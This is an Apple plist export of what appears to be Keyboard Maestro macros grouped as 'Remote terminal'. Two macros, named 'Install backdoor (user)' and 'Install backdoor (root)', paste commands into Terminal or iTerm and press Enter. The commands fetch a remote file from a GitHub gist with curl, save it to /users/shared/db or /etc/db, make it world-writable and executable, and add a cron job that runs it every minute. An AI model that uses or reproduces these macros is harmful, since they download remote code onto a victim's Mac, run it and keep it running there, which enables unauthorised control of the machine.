<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>603140665.49842894</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt &gt; /users/shared/db; chmod 777 /users/shared/db</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
					<dict>
						<key>MacroActionType</key>
						<string>Pause</string>
						<key>Time</key>
						<string>0.5</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>echo "* * * * * /users/shared/db" &gt; /tmp/cron; crontab /tmp/cron; rm /tmp/cron</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>610596097.01093602</real>
				<key>Name</key>
				<string>Install backdoor (user)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>827BB293-7DE1-4CA4-9977-661C1B3353BF</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Remote terminal</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>570F5871-E330-417C-9E7A-0D67E902C1C8</string>
		<key>UID</key>
		<string>482E9655-1457-43EC-85DD-C6B142E11DBA</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>603140665.49842894</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt &gt; /etc/db &amp;&amp; chmod 777 /etc/db</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
					<dict>
						<key>MacroActionType</key>
						<string>Pause</string>
						<key>Time</key>
						<string>0.5</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>echo "* * * * * /etc/db" &gt; /tmp/cron &amp;&amp; crontab /tmp/cron &amp;&amp; rm /tmp/cron </string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>610596069.15278399</real>
				<key>Name</key>
				<string>Install backdoor (root)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>E7E0A8A2-3494-4A31-BDCC-AED8AFFAA590</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Remote terminal</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>570F5871-E330-417C-9E7A-0D67E902C1C8</string>
		<key>UID</key>
		<string>482E9655-1457-43EC-85DD-C6B142E11DBA</string>
	</dict>
</array>
</plist>
